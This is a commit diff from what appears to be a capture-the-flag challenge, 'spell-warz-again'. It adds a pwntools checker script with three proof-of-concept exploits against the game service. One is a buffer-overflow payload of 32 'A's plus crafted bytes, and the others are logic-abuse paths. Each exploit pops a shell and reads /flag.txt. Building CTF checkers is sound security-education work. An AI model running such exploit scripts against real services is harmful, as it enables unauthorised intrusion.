update

checker.py

@@ -0,0 +1,101 @@
+#! /usr/bin/env python2
+from pwn import process, remote
+
+HOST = "192.168.2.20"
+TOTAL_TEAMS = 10
+FORMAT = "SlashRootCTF"
+
+
+def run():
+    # return process(FILENAME)
+    return remote("127.0.0.1", 60204)
+
+
+def poc0(host, port):
+    p = remote(host, port)
+    p.recvuntil(">")
+    p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
+    if "young" in p.recvuntil(">"):
+        p.sendline("y")
+        p.recvuntil(">")
+        p.sendline("2")
+        p.recvuntil(">")
+        p.sendline("4")
+        p.recvuntil(">")
+        p.sendline("y")
+        for _ in xrange(10):
+            p.recvuntil(">")
+            p.sendline("99")
+        p.sendline("cat /flag.txt")
+        flag = p.recv(46)
+        if FORMAT in flag:
+            return True
+        else:
+            return False
+    else:
+        return False
+
+
+def poc1(host, port):
+    p = remote(host, port)
+    p.recvuntil(">")
+    p.sendline("Leo")
+    p.recvuntil(">")
+    p.sendline("y")
+    for _ in range(2):
+        p.recvuntil(">")
+        p.sendline("3")
+        p.recvuntil(">")
+        p.sendline("0")
+        if "Who" in p.recvuntil(">"):
+            return False
+        p.sendline("y")
+        p.recvuntil(">")
+        p.sendline("1")
+    p.recvuntil(">")
+    p.sendline("4")
+    p.recvuntil(">")
+    p.sendline("y")
+    for _ in range(10):
+        p.recvuntil(">")
+        p.sendline("99")
+    p.sendline("cat /flag.txt")
+    flag = p.recv(46)
+    if FORMAT in flag:
+        return True
+    else:
+        return False
+
+
+def poc2(host, port):
+    p = remote(host, port)
+    p.recvuntil(">")
+    p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
+    p.recvuntil(">")
+    p.sendline("y")
+    p.recvuntil(">")
+    p.sendline("6")
+    if "Lv: 1000000" in p.recvuntil(">"):
+        p.sendline("2")
+        p.recvuntil(">")
+        p.sendline("4")
+        p.recvuntil(">")
+        p.sendline("y")
+        for _ in xrange(10):
+            p.recvuntil(">")
+            p.sendline("99")
+        p.sendline("cat /flag.txt")
+        flag = p.recv(46)
+        if FORMAT in flag:
+            return True
+        else:
+            return False
+    else:
+        return False
+
+
+if __name__ == "__main__":
+    for i in range(1):
+        print poc0(HOST, (60004 + (i*100)))
+        print poc1(HOST, (60004 + (i*100)))
+        print poc2(HOST, (60004 + (i*100)))

lib/UserInterface.cpp

@@ -1,7 +1,7 @@
 #include "UserInterface.hpp"
 
-const int UserInterface::INTERVAL = 100;
-const int UserInterface::MINI_INTERVAL = 50;
+const int UserInterface::INTERVAL = 0;
+const int UserInterface::MINI_INTERVAL = 0;
 const int UserInterface::MAX_DAY = 28;
 const int UserInterface::MAX_MONTH = 12;
 const int UserInterface::MAX_YEAR = 100;
@@ -225,4 +225,4 @@ void UserInterface::characterInfo(Character &c)
               << "\n  Xp: " << c.getExperience()
               << "\n  next: " << c.toNextLevel()
               << "\n++++++++++++++++++++++++" << std::endl;
-}
+}

poc.py

@@ -4,7 +4,7 @@ FILENAME = "./spell-warz-again-final"
 
 def run():
     # return process(FILENAME)
-    return remote("103.200.7.150", 60104)
+    return remote("127.0.0.1", 60204)
 
 def poc0():
     p = run()
@@ -52,7 +52,7 @@ def poc1():
 def poc2():
     p = run()
     print p.recvuntil(">")
-    p.sendline("__th3_w0rLd_D3str0Y3r__")
+    p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
     print p.recvuntil(">")
     p.sendline("y")
     print p.recvuntil(">")